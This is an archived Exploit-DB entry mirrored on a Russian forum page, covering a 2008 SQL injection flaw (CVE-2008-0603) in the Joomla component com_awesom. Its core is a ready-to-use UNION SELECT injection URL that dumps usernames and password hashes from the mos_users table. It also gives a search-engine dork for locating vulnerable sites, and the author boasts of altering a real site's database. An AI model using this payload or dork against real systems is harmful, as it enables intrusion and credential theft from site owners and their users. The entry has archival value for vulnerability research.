- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5058
- Проверка EDB
-
- Пройдено
- Автор
- S@BUN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-0603
- Дата публикации
- 2008-02-04
Код:
#########################################################################
#
# joomla SQL Injection(com_awesom)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
# DORKS 1 : allinurl :"com_awesom"
#
#
#########################################################################
#
# ı changed ATATÜRK.com's db. soo dont look
#
# ATATÜRK.com db si değiştirilip kullanıcısına bildirilmiştir.
#
##########################################################################
EXPLOIT :
index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
##########################################################################
# S@BUN www.hackturkiye.com S@BUN
##########################################################################
# S@BUN GOOD LUCKY S@BUN
##########################################################################
<name>Awesom</name>
<creationDate>24/05/2004</creationDate>
<author>Madd0</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>[email protected]</authorEmail>
<authorUrl>amazoop.sourceforge.net</authorUrl>
<version>0.3.2</version>
<description>Awesom!, or Amazon Web Services for Opensource Mambo, is a component that lets you
create lists of products to feature on your Mambo-driven site.<br />
These lists can be customized or can be automatically generated with information provided
by Amazon through Amazon Web Services.<br />
Additionally, if you are an Amazon associate, you can configure Awesom to link to Amazon
using your associate ID in order to earn comissions.
</description>
# milw0rm.com [2008-02-04]
- Источник
- www.exploit-db.com